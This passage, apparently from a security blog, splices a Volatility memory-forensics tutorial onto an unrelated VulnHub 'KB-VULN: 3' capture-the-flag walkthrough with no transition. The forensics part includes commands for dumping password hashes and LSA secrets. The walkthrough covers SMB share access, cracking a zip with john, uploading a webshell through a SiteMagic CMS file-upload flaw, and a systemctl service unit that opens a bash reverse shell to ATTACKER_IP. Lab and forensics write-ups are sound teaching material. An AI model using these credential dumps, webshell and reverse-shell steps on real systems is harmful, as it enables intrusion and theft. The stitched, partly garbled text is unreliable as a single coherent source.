·         Caches (clipboard data, SAM databases, edited files, passwords, web addresses, commands)

·         Presence of hidden data, malware, etc.

Here, we have taken a memory dump of a Windows7 system using the Belkasoft RAM Capturer, which can be downloaded from here.

Memory Analysis

Once the dump is available, we will begin the forensic analysis of the memory using the Volatility Memory Forensics Framework, which can be downloaded from here. The Volatility framework supports analysis of memory dumps from all versions and service packs of Windows from XP to Windows 10, as well as Server 2003 to Server 2016. In this article, we will be analyzing the memory dump in Kali Linux, where Volatility comes pre-installed.

Dump Format Supported

·         Raw format

·         Hibernation File

·         VM snapshot

·         Microsoft crash dump

Switch on your Kali Linux Machines, and to get a basic list of all the available options, plugins, and flags to use in the analysis, you can type

volatility -h

Imageinfo

When a memory dump is taken, it is extremely important to know which operating system was in use. Volatility will try to read the image and suggest the related profiles for the given memory dump. The imageinfo plugin also displays the date and time at which the sample was collected, the number of CPUs present, etc. To obtain the details of the RAM, you can type:

volatility -f ram.mem imageinfo

A profile is a categorization of a specific operating system, its version, and its hardware architecture. A profile generally includes metadata information, system call information, etc. You may notice that multiple profiles are suggested to you.
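When several profiles are suggested, you usually try the first one. A small sketch of pulling the candidates out of the "Suggested Profile(s)" line (the sample text below is illustrative, not taken from this dump):

```python
# Parse the "Suggested Profile(s)" line of an imageinfo run and pick the
# first candidate profile (sample output for illustration only).
sample = "Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64"
label, _, value = sample.partition(":")
profiles = [p.strip() for p in value.split(",")]
first = profiles[0]
print(first)  # → Win7SP1x64
```

If the first profile yields odd results, kdbgscan (next section) is the more reliable way to settle on one.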



Kdbgscan

This plugin finds and analyses profiles based on the Kernel Debugger data block (KDBG), and thus pinpoints the correct profile for the raw image. To determine the correct profile for the memory analysis, type:

volatility -f ram.mem kdbgscan



Processes

When a system is in an active state, it is normal for it to have multiple processes running in the background, and these can be found in the volatile memory. The presence of any hidden process can also be parsed out of a memory dump, and processes terminated shortly before the capture can likewise be recorded and analyzed. There are a few plugins that can be used to list the processes.

Pslist

To identify the presence of any rogue processes and to view any high-level running processes, one can use

volatility -f ram.mem --profile=Win7SP1x64 pslist -P

On executing this command, the list of running processes is displayed along with the process ID assigned to each and its parent process ID. Details about the threads, sessions, and handles are also shown, as is the timestamp of each process's start. This helps to identify whether an unknown process is running, or was running at an unusual time.
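Pslist output is whitespace-separated columns (offset, name, PID, PPID, threads, handles, and so on), so it is easy to post-process. A sketch pulling name, PID and PPID from one sample row (values are illustrative):

```python
# Pslist rows are whitespace-separated: Offset, Name, PID, PPID, Thds,
# Hnds, ... — pull out the fields you care about from a sample row.
row = "0xfffffa8000ca0040 explorer.exe 1504 1464 23 771 1 0 2023-01-01 10:00:00"
cols = row.split()
name, pid, ppid = cols[1], int(cols[2]), int(cols[3])
print(name, pid, ppid)  # → explorer.exe 1504 1464
```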



Psscan

This plugin gives a detailed list of processes found in the memory dump. Because it uses pool tag scanning, it can also detect hidden or unlinked processes that pslist would miss.

volatility -f ram.mem --profile=Win7SP1x64 psscan



Pstree

This plugin presents the process list as a parent-child tree, which makes unknown or abnormal processes easier to spot. Child processes are indicated by indentation and periods.

volatility -f ram.mem --profile=Win7SP1x64 pstree

 


 

DLLs

DLLlist

DLLs (Dynamic-Link Libraries) are automatically added to this list when a process calls LoadLibrary, and they are not removed until the process exits. Use the -p flag to display the DLLs for particular processes instead of all processes:

volatility -f ram.mem --profile=Win7SP1x64 dlllist -p 116,788

 


DLLDump

This plugin is used to dump the DLLs from the memory space of the processes into another location to analyze it. To take a dump of the DLLs you can type,

volatility -f ram.mem --profile=Win7SP1x64 dlldump --dump-dir /root/ramdump/

 


Handles

This plugin is used to display the open handles that are present in a process. This plugin applies to files, registry keys, events, desktops, threads, and all other types of objects. To see the handles present in the dump, you can type,

volatility -f ram.mem --profile=Win7SP1x64 handles

 


Getsids

This plugin is used to view the Security Identifiers (SIDs) associated with a process. It can help in identifying processes that have maliciously escalated privileges, and which processes belong to specific users. To get the details for a particular process ID, you can type:

volatility -f ram.mem --profile=Win7SP1x64 getsids -p 464

 


Netscan

This plugin helps in finding network-related artifacts present in the memory dump. It makes use of pool tag scanning. This plugin finds all the TCP endpoints, TCP listeners, UDP endpoints, and UDP listeners. It provides details about the local and remote IP and also about the local and remote port. To get details on the network artifacts, you can type:

volatility -f ram.mem --profile=Win7SP1x64 netscan
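Each netscan row carries the protocol, local and remote endpoint, state, and the owning process, so suspicious connections can be filtered out programmatically. A sketch splitting one sample TCP row (addresses are illustrative):

```python
# Netscan columns include protocol, local addr:port, remote addr:port and
# state — split a sample row into its endpoints.
row = "0x1e527cf0 TCPv4 192.168.1.10:49160 172.217.2.4:443 ESTABLISHED 1504 explorer.exe"
_, proto, local, remote, state = row.split()[:5]
local_ip, local_port = local.rsplit(":", 1)
remote_ip, remote_port = remote.rsplit(":", 1)
print(proto, remote_ip, remote_port, state)
```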



Hivelist

This plugin can be used to locate the virtual addresses of the registry hives in memory, along with their full paths on disk. To obtain the hive list from the memory dump, you can type:

volatility -f ram.mem --profile=Win7SP1x64 hivelist

 


Timeliner

This plugin usually creates a timeline from the various artifacts found in the memory dump. To locate the artifacts according to the timeline, you can use the following command:

volatility -f ram.mem --profile=Win7SP1x64 timeliner



Hashdump

This plugin extracts the local account password hashes from the SAM hive found in the memory dump. The hashes obtained can then be cracked using John the Ripper, Hashcat, etc. To gather the hashdump, you can use the command:

volatility -f ram.mem --profile=Win7SP1x64 hashdump
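Hashdump emits lines in the pwdump format user:RID:LM:NT:::, and the NT field is what you feed to john or hashcat. A sketch splitting one such line (the hashes shown are the well-known empty-password LM and NT values):

```python
# Split a pwdump-format line (user:RID:LM:NT:::) as produced by hashdump.
# The sample hashes are the standard empty-password LM/NT values.
line = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"
user, rid, lm_hash, nt_hash = line.split(":")[:4]
print(user, nt_hash)
```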



Lsadump

This plugin is used to dump LSA secrets from the registry in the memory dump. This plugin gives out information like the default password, the RDP public key, etc. To perform a lsadump, you can type the following command:

volatility -f ram.mem --profile=Win7SP1x64 lsadump



Modscan

This plugin is used to locate kernel modules and their related objects. It can pick up previously unloaded drivers as well as drivers that have been hidden or unlinked by rootkits on the system. To scan for modules, type:

volatility -f ram.mem --profile=Win7SP1x64 modscan



Filescan

This plugin is used to find FILE_OBJECTs present in physical memory using pool tag scanning. It can find open files even when a rootkit hides them from the file listing. To make use of this plugin, you can type the following command:

volatility -f ram.mem --profile=Win7SP1x64 filescan

 


Svcscan

This plugin lists the services registered in your memory image. The output shows the process ID of each service, its service name, display name, service type, and service state. It also shows the binary path for the registered service: a .exe for user-mode services and a driver name for services that run from kernel mode. To find the details on the services, type:

volatility -f ram.mem --profile=Win7SP1x64 svcscan


Cmdscan

This plugin searches the memory dump of XP/2003/Vista/2008 and Windows 7 for commands that the attacker might have entered through a command prompt (cmd.exe). It is one of the most powerful commands that one can use to gain visibility into an attacker’s actions on a victim system. To conduct a cmdscan, you can make use of the following command:

volatility -f ram.mem --profile=Win7SP1x64 cmdscan



Iehistory

This plugin recovers fragments of Internet Explorer history by locating index.dat cache files. To find IE history entries, you can type the following command:

volatility -f ram.mem --profile=Win7SP1x64 iehistory




Dumpregistry

This plugin allows one to dump a registry hive to a disk location. To dump the registry hive, you can use the following command:

volatility -f ram.mem --profile=Win7SP1x64 dumpregistry --dump-dir /root/ramdump/

 


Moddump

This plugin is used to extract a kernel driver to a file. You can do this by using the following command:

volatility -f ram.mem --profile=Win7SP1x64 moddump --dump-dir /root/ramdump/



 


Procdump

This plugin dumps a process's executable to a single location. Note that malware may intentionally forge size fields in the PE header so that memory dumping tools fail. To collect the dump of the processes, you can type:

volatility -f ram.mem --profile=Win7SP1x64 procdump --dump-dir /root/ramdump/

 


Memdump

The memdump plugin is used to dump the memory-resident pages of a process into a separate file. You can also look up a particular process using -p and provide a directory path with --dump-dir to generate the output. To take a dump of the memory-resident pages, you can use the following command:

volatility -f ram.mem --profile=Win7SP1x64 memdump --dump-dir /root/ramdump/



Notepad

Notepad files are among the most commonly sought artifacts in a RAM dump. To find the contents present in a notepad file (this plugin applies to XP/2003 profiles), you can use the following command:

volatility -f ram.mem --profile=WinXPSP2x86 notepad

KB-VULN: 3 Vulnhub Walkthrough


Today we are going to solve another boot2root challenge called "KB-VULN: 3".  It's available at VulnHub for penetration testing and you can download it from here.

Credit for making this lab goes to Machine. Let's start and learn how to break it down successfully.

Level: Easy

Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         SMBClient

Exploiting

·         Cracking backup zip2john & john the ripper

·         SiteMagic CMS - Arbitrary File Upload

Privilege Escalation

·         Abuse uncommon setuid binary systemctl

Capture the flag

 

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX

 

 

So, we add the IP address to our "/etc/hosts" file and start by running a scan of all ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A -p- 192.168.10.167


 

Enumeration

We accessed the website, but found a 404 error.


 

We check whether the server allows SMB null sessions and list two shares. One of them draws our attention because of its comment.

 


 

We enter the "Files" share and find a backup of the website. We download it, but it is password protected.


Exploiting

We will use zip2john to get the zip password hash.

 


 

We check the content of the "pass-zip.hash" file and launch john with the rockyou dictionary.

We wait a bit and get the password for the zip.
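The idea behind the crack can be sketched generically: hash every wordlist candidate and compare against the target digest. SHA-256 stands in here purely for illustration; john actually works on the PKZIP-specific format that zip2john produces:

```python
import hashlib

# Generic dictionary attack: hash each candidate and compare to the target.
# SHA-256 is a stand-in for the real PKZIP hash handled by zip2john/john.
target = hashlib.sha256(b"sunshine").hexdigest()
wordlist = ["123456", "password", "sunshine", "iloveyou"]

found = None
for candidate in wordlist:
    if hashlib.sha256(candidate.encode()).hexdigest() == target:
        found = candidate
        break
print(found)  # → sunshine
```

Rockyou simply plays the role of a very large wordlist in this loop, which is why weak, reused passwords fall so quickly.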


 

We unzip the archive and find the contents of a SiteMagic CMS installation.

 


 

We review the configuration file "config.xml.php" and find the CMS administrator credentials.


 

This CMS is vulnerable to Arbitrary File Upload: https://www.exploit-db.com/exploits/48788

 

Manually it can also be done in the following way:

 

We access the site's login, authenticate ourselves with the obtained credentials, go to Content and upload a webshell (I used pentestmonkey's webshell)

 


 

We access the directory and see that our webshell has been uploaded.


 

We set up a netcat listener and trigger our webshell. We get access to the machine; now we execute our two favorite commands to get an interactive shell.
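The post does not name the "two favorite commands"; the usual pair (an assumption on our part) for upgrading a dumb netcat shell is shown below as strings, to be typed inside the reverse shell:

```python
# Typical shell-upgrade pair (an assumption; adjust to the target's python):
SPAWN_PTY = "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"  # get a proper TTY
SET_TERM = "export TERM=xterm"  # enable clear, arrow keys, etc.
print(SPAWN_PTY)
print(SET_TERM)
```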

 


 

We access the home directory of the user "heisenberg" and have permission to read the file "user.txt".


 

Privilege Escalation (root)

 

After reviewing the contents of the user's home directory without finding anything useful, we execute the "find" command to obtain a list of setuid binaries that we have permission to execute.
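The standard invocation for this enumeration (flags are the usual ones; the exact command in the screenshot may differ) is:

```shell
# List files with the setuid bit set — candidate privilege-escalation
# binaries; errors from unreadable paths are discarded.
find / -perm -4000 -type f 2>/dev/null
```

On this box, systemctl shows up in the results, which is what we abuse next.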

 


 

Among these binaries, we find "systemctl". We search Google for information about it and find several very similar methods, although only this one worked for me:

We create a file "name.service" with the following content:
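A reverse-shell unit along these lines does the job; the unit name and the attacker IP/port below are placeholders to adjust (the exact file used in the walkthrough is the one in the screenshot):

```ini
# Hypothetical service unit for the systemctl SUID escalation (a sketch).
[Unit]
Description=demo

[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

[Install]
WantedBy=multi-user.target
```

The setuid systemctl then links and starts the unit, running ExecStart as root.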


 

We download our "m3.service" onto the victim machine into the "/dev/shm" directory (our user's home directory lacked write permission, and /tmp did not work).

 

We set up a netcat listener and start our service.

 


 

If everything went well, we will get a shell as root. Now we read the root flag.
